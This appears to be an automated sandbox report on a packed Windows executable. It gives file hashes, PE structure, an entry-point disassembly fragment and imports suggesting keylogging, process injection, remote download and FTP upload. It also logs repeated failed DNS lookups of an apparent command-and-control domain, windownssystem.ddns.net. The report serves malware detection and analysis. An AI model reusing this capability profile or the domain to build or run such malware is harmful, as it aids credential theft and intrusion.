MD5:	689E2126A85BF55121488295EE068FA1
SHA1:	09BAAA253A49D80C18326DFBCA106551EBF22DD6
SHA-256:	D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
SHA-512:	C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
Malicious:	false
Preview:	..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
Entropy (8bit):	2.825247174180131
TrID:	Win32 Executable (generic) a (10002005/4) 98.97% InstallShield setup (43055/19) 0.43% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Generic Win/DOS Executable (2004/3) 0.02%
File name:	7FW4ce2RDy.exe
File size:	354304
MD5:	776211eed31b6a8ea3539ac1d822362c
SHA1:	b18225f3217536c802d43d9e4a0ac8ac22a90109
SHA256:	f32fb1af5db650065e6e1d02ade5506e6c0903e4bbc9ff6ff2fbf94bef6ffba4
SHA512:	c067fd43414e3ccb87cef9b707125634be0ba5f0f6aa6e13a63de791ff2cb4a1b0ebb63fd174a5940f4e6aab0c1e349977da6e2eda633bd64ec1502a38f3d3f4
SSDEEP:	1536:+Dsq+QV4rObAdXWpf/y+keoYTcMD62/OxwA1SFGt:Z44rj/yo326AOiA1SMt
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	a2a0b496b2caca72

Static PE Info

General
Entrypoint:	0x1000d0f4
Entrypoint Section:	UPX0
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d98325588570403f283a229c660142db

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
mov ecx, 000002BCh
push 00000000h
push 00000000h
dec ecx
jne 00007FB3BCC20C8Bh
push ebx
push esi
push edi
mov eax, 1000D030h
call 00007FB3BCC18869h
mov edi, 1000F834h
xor eax, eax
push ebp
push 1000D759h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
mov eax, 1000D0D0h
call 00007FB3BCC16B8Ch
mov eax, dword ptr [1000E134h]
mov byte ptr [eax], 00000001h
push 00008007h
call 00007FB3BCC18A76h
lea edx, dword ptr [ebp-14h]
mov eax, 00000001h
call 00007FB3BCC1949Dh
mov eax, dword ptr [ebp-14h]
mov edx, 1000D76Ch
call 00007FB3BCC17570h
jne 00007FB3BCC20CCDh
lea edx, dword ptr [ebp-18h]
xor eax, eax
call 00007FB3BCC19484h
mov edx, dword ptr [ebp-18h]
mov eax, 10012580h
call 00007FB3BCC172CFh
push 00000000h
push 00000000h
push 00000000h
mov eax, dword ptr [10012580h]
call 00007FB3BCC1741Fh
push eax
push 1000D77Ch
push 00000000h
call 00007FB3BCC1F1FEh
push 00000000h
call 00007FB3BCC18937h
lea edx, dword ptr [ebp-1Ch]
mov eax, 00000001h
call 00007FB3BCC19446h
mov eax, dword ptr [ebp-1Ch]
mov edx, 1000D78Ch
call 00007FB3BCC17519h
jne 00007FB3BCC20C9Ch
push 00001770h
call 00007FB3BCC18A31h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x58000	0x154	.imports
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x56000	0x15e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x55670	0x18	UPX1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0x44000	0x43400	False	0.106151254647	data	1.70105807457	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1	0x45000	0x11000	0x10800	False	0.6171875	data	6.08119940627	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x56000	0x2000	0x1a00	False	0.319411057692	data	4.08638397556	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.imports	0x58000	0x1000	0xe00	False	0.346261160714	data	4.37091582011	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x48374	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x4849c	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x48a04	0x2e8	data
RT_ICON	0x48cec	0x8a8	data
RT_ICON	0x56378	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x564a4	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x56a10	0x2e8	data
RT_ICON	0x56cfc	0x8a8	data
RT_RCDATA	0x4a7b4	0x10	data
RT_RCDATA	0x4a7c4	0x108	data
RT_RCDATA	0x4a8cc	0x1390	data
RT_RCDATA	0x4bc5c	0x7850	data
RT_GROUP_ICON	0x575a8	0x3e	data
RT_GROUP_ICON	0x534ec	0x3e	data

Imports

DLL	Import
KERNEL32.DLL	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, WideCharToMultiByte, MultiByteToWideChar, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll	GetKeyboardType, MessageBoxA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
KERNEL32.DLL	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegSetValueExW, RegQueryValueExW, RegOpenKeyExW, RegCreateKeyW, RegCloseKey
KERNEL32.DLL	lstrlenW, WriteProcessMemory, WriteFile, WaitForSingleObject, VirtualProtectEx, VirtualFreeEx, VirtualFree, VirtualAllocEx, VirtualAlloc, TerminateThread, TerminateProcess, Sleep, SizeofResource, SetThreadPriority, SetThreadContext, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ReadProcessMemory, ReadFile, LockResource, LoadResource, LoadLibraryA, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GetWindowsDirectoryW, GetThreadContext, GetTempPathW, GetSystemDirectoryW, GetModuleHandleA, GetModuleFileNameW, GetLocalTime, GetLastError, GetFileSize, GetFileAttributesW, GetCommandLineW, FreeResource, InterlockedIncrement, InterlockedDecrement, FindResourceW, FindFirstFileW, FindClose, ExitProcess, DeleteFileW, DeleteCriticalSection, CreateThread, CreateRemoteThread, CreateProcessW, CreateMutexW, CreateFileW, CreateEventA, CreateDirectoryW, CopyFileW, CloseHandle
user32.dll	CreateWindowExW, CreateWindowExA, UnregisterClassW, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, ShowWindow, SetWindowsHookExW, SetWindowLongA, SetClipboardViewer, SendMessageA, RegisterWindowMessageW, RegisterClassW, RegisterClassA, PostMessageA, PeekMessageA, OpenClipboard, MapVirtualKeyW, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowLongA, GetMessageA, GetKeyboardLayout, GetKeyState, GetForegroundWindow, GetDesktopWindow, GetClipboardData, GetClassInfoA, DispatchMessageA, DestroyWindow, DefWindowProcA, CloseClipboard, CharUpperW, CharNextW, CharLowerW, CallNextHookEx
shlwapi.dll	SHDeleteKeyW
shell32.dll	SHGetPathFromIDListW, SHGetSpecialFolderLocation, SHGetMalloc, FindExecutableW
URLMON.DLL	URLDownloadToCacheFileW
wininet.dll	InternetCloseHandle, FtpPutFileW, FtpSetCurrentDirectoryW, InternetOpenW, InternetConnectW
user32.dll	GetKeyboardState, ToUnicodeEx
shell32.dll	ShellExecuteW
ntdll.dll	NtUnmapViewOfSection
shlwapi.dll	SHDeleteValueW, SHDeleteKeyW

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2021 16:43:20.096625090 CEST	57875	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:43:20.141801119 CEST	53	57875	8.8.8.8	192.168.2.3
Sep 30, 2021 16:43:23.020596981 CEST	54154	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:43:23.043181896 CEST	53	54154	8.8.8.8	192.168.2.3
Sep 30, 2021 16:43:27.934091091 CEST	52806	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:43:27.947838068 CEST	53	52806	8.8.8.8	192.168.2.3
Sep 30, 2021 16:43:38.074309111 CEST	53910	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:43:38.096344948 CEST	53	53910	8.8.8.8	192.168.2.3
Sep 30, 2021 16:43:42.170567989 CEST	64021	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:43:42.191853046 CEST	53	64021	8.8.8.8	192.168.2.3
Sep 30, 2021 16:43:44.799498081 CEST	60784	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:43:44.813308954 CEST	53	60784	8.8.8.8	192.168.2.3
Sep 30, 2021 16:43:45.749758005 CEST	51143	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:43:45.764856100 CEST	53	51143	8.8.8.8	192.168.2.3
Sep 30, 2021 16:43:48.858751059 CEST	56009	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:43:48.892848969 CEST	53	56009	8.8.8.8	192.168.2.3
Sep 30, 2021 16:43:49.304711103 CEST	59026	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:43:49.327239990 CEST	53	59026	8.8.8.8	192.168.2.3
Sep 30, 2021 16:43:52.914905071 CEST	49572	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:43:52.927978992 CEST	53	49572	8.8.8.8	192.168.2.3
Sep 30, 2021 16:43:56.480106115 CEST	60823	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:43:56.503549099 CEST	53	60823	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:00.041601896 CEST	52130	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:00.088879108 CEST	53	52130	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:03.747132063 CEST	55102	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:03.760642052 CEST	53	55102	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:06.467978001 CEST	56236	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:06.495043993 CEST	53	56236	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:07.293972015 CEST	56527	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:07.307854891 CEST	53	56527	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:11.084230900 CEST	49559	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:11.098330021 CEST	53	49559	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:12.881702900 CEST	52650	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:12.902245998 CEST	53	52650	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:13.519047976 CEST	63297	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:13.571347952 CEST	53	63297	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:14.197781086 CEST	58361	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:14.212165117 CEST	53	58361	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:14.697310925 CEST	53615	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:14.717567921 CEST	53	53615	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:14.909430027 CEST	50728	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:14.923413992 CEST	53	50728	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:15.071384907 CEST	53777	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:15.098577023 CEST	53	53777	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:15.310091019 CEST	57106	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:15.381442070 CEST	53	57106	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:15.822326899 CEST	60352	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:15.835849047 CEST	53	60352	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:16.157025099 CEST	56773	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:16.169327021 CEST	53	56773	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:16.260858059 CEST	60982	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:16.274626970 CEST	53	60982	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:16.778482914 CEST	58058	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:16.791419029 CEST	53	58058	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:17.714875937 CEST	64367	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:17.822870970 CEST	53	64367	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:18.245699883 CEST	51539	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:18.258774042 CEST	53	51539	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:18.793023109 CEST	55393	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:18.823874950 CEST	53	55393	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:18.930058956 CEST	50585	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:19.015294075 CEST	53	50585	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:20.109635115 CEST	63456	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:20.123543978 CEST	53	63456	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:22.152010918 CEST	58540	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:22.165651083 CEST	53	58540	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:24.775824070 CEST	55108	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:24.797271967 CEST	53	55108	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:25.784673929 CEST	58942	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:25.798405886 CEST	53	58942	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:27.651890993 CEST	64432	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:27.666898966 CEST	53	64432	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:29.328229904 CEST	49250	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:29.341336966 CEST	53	49250	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:32.872898102 CEST	63490	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:32.887037039 CEST	53	63490	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:34.393351078 CEST	65110	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:34.408071995 CEST	53	65110	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:36.526617050 CEST	61120	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:36.541001081 CEST	53	61120	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:40.077255011 CEST	53079	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:40.098599911 CEST	53	53079	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:43.693994999 CEST	50824	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:43.710228920 CEST	53	50824	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:43.996954918 CEST	56706	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:44.010612965 CEST	53	56706	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:47.248116970 CEST	53569	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:47.261413097 CEST	53	53569	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:50.792040110 CEST	62855	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:50.806456089 CEST	53	62855	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:54.339596987 CEST	51046	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:54.353445053 CEST	53	51046	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:54.513010979 CEST	65501	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:54.539092064 CEST	53	65501	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:55.530015945 CEST	53465	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:55.544368982 CEST	53	53465	8.8.8.8	192.168.2.3
Sep 30, 2021 16:44:57.888556004 CEST	49290	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:58.971708059 CEST	49290	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:44:58.984798908 CEST	53	49290	8.8.8.8	192.168.2.3
Sep 30, 2021 16:45:02.654875040 CEST	59754	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:45:02.669064045 CEST	53	59754	8.8.8.8	192.168.2.3
Sep 30, 2021 16:45:04.235704899 CEST	49234	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:45:04.249644995 CEST	53	49234	8.8.8.8	192.168.2.3
Sep 30, 2021 16:45:06.211750031 CEST	58720	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:45:06.225447893 CEST	53	58720	8.8.8.8	192.168.2.3
Sep 30, 2021 16:45:06.618799925 CEST	57447	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:45:06.633373022 CEST	53	57447	8.8.8.8	192.168.2.3
Sep 30, 2021 16:45:09.770956993 CEST	63583	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:45:09.784416914 CEST	53	63583	8.8.8.8	192.168.2.3
Sep 30, 2021 16:45:13.457129955 CEST	64099	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:45:13.470329046 CEST	53	64099	8.8.8.8	192.168.2.3
Sep 30, 2021 16:45:17.002443075 CEST	64610	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:45:17.014648914 CEST	53	64610	8.8.8.8	192.168.2.3
Sep 30, 2021 16:45:20.760040045 CEST	51989	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:45:20.774147034 CEST	53	51989	8.8.8.8	192.168.2.3
Sep 30, 2021 16:45:24.322119951 CEST	53152	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:45:24.336463928 CEST	53	53152	8.8.8.8	192.168.2.3
Sep 30, 2021 16:45:27.889450073 CEST	61590	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:45:27.901789904 CEST	53	61590	8.8.8.8	192.168.2.3
Sep 30, 2021 16:45:28.560480118 CEST	56077	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:45:28.575278044 CEST	53	56077	8.8.8.8	192.168.2.3
Sep 30, 2021 16:45:30.209975004 CEST	57951	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:45:30.211796045 CEST	53276	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:45:30.225485086 CEST	53	53276	8.8.8.8	192.168.2.3
Sep 30, 2021 16:45:30.237848997 CEST	53	57951	8.8.8.8	192.168.2.3
Sep 30, 2021 16:45:31.415431023 CEST	60135	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:45:31.428962946 CEST	53	60135	8.8.8.8	192.168.2.3
Sep 30, 2021 16:45:34.954087019 CEST	49849	53	192.168.2.3	8.8.8.8
Sep 30, 2021 16:45:34.967259884 CEST	53	49849	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 30, 2021 16:43:38.074309111 CEST	192.168.2.3	8.8.8.8	0x7b2e	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:43:42.170567989 CEST	192.168.2.3	8.8.8.8	0x99c2	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:43:45.749758005 CEST	192.168.2.3	8.8.8.8	0x41c0	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:43:49.304711103 CEST	192.168.2.3	8.8.8.8	0x5225	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:43:52.914905071 CEST	192.168.2.3	8.8.8.8	0x6dfd	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:43:56.480106115 CEST	192.168.2.3	8.8.8.8	0x4106	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:00.041601896 CEST	192.168.2.3	8.8.8.8	0x6c91	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:03.747132063 CEST	192.168.2.3	8.8.8.8	0x7c63	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:07.293972015 CEST	192.168.2.3	8.8.8.8	0x8df0	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:11.084230900 CEST	192.168.2.3	8.8.8.8	0xaa88	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:14.697310925 CEST	192.168.2.3	8.8.8.8	0xc3d9	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:18.245699883 CEST	192.168.2.3	8.8.8.8	0xfda8	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:22.152010918 CEST	192.168.2.3	8.8.8.8	0x9587	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:25.784673929 CEST	192.168.2.3	8.8.8.8	0x87d8	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:29.328229904 CEST	192.168.2.3	8.8.8.8	0x3033	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:32.872898102 CEST	192.168.2.3	8.8.8.8	0x2205	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:36.526617050 CEST	192.168.2.3	8.8.8.8	0x50b0	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:40.077255011 CEST	192.168.2.3	8.8.8.8	0x379d	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:43.693994999 CEST	192.168.2.3	8.8.8.8	0x216f	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:47.248116970 CEST	192.168.2.3	8.8.8.8	0x4000	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:50.792040110 CEST	192.168.2.3	8.8.8.8	0xde99	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:54.339596987 CEST	192.168.2.3	8.8.8.8	0x5e1f	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:57.888556004 CEST	192.168.2.3	8.8.8.8	0xcbd3	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:58.971708059 CEST	192.168.2.3	8.8.8.8	0xcbd3	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:02.654875040 CEST	192.168.2.3	8.8.8.8	0x3f15	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:06.211750031 CEST	192.168.2.3	8.8.8.8	0xb135	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:09.770956993 CEST	192.168.2.3	8.8.8.8	0xaf7a	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:13.457129955 CEST	192.168.2.3	8.8.8.8	0xd330	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:17.002443075 CEST	192.168.2.3	8.8.8.8	0xc57b	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:20.760040045 CEST	192.168.2.3	8.8.8.8	0x4333	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:24.322119951 CEST	192.168.2.3	8.8.8.8	0xf18b	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:27.889450073 CEST	192.168.2.3	8.8.8.8	0x1ca5	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:31.415431023 CEST	192.168.2.3	8.8.8.8	0x88fa	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)
Sep 30, 2021 16:45:34.954087019 CEST	192.168.2.3	8.8.8.8	0xf679	Standard query (0)	windownssystem.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 30, 2021 16:43:38.096344948 CEST	8.8.8.8	192.168.2.3	0x7b2e	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:43:42.191853046 CEST	8.8.8.8	192.168.2.3	0x99c2	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:43:45.764856100 CEST	8.8.8.8	192.168.2.3	0x41c0	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:43:49.327239990 CEST	8.8.8.8	192.168.2.3	0x5225	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:43:52.927978992 CEST	8.8.8.8	192.168.2.3	0x6dfd	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:43:56.503549099 CEST	8.8.8.8	192.168.2.3	0x4106	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:00.088879108 CEST	8.8.8.8	192.168.2.3	0x6c91	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:03.760642052 CEST	8.8.8.8	192.168.2.3	0x7c63	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:07.307854891 CEST	8.8.8.8	192.168.2.3	0x8df0	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:11.098330021 CEST	8.8.8.8	192.168.2.3	0xaa88	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:14.717567921 CEST	8.8.8.8	192.168.2.3	0xc3d9	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:18.258774042 CEST	8.8.8.8	192.168.2.3	0xfda8	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:22.165651083 CEST	8.8.8.8	192.168.2.3	0x9587	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
Sep 30, 2021 16:44:25.798405886 CEST	8.8.8.8	192.168.2.3	0x87d8	Name error (3)	windownssystem.ddns.net	none	none	A (IP address)	IN (0x0001)
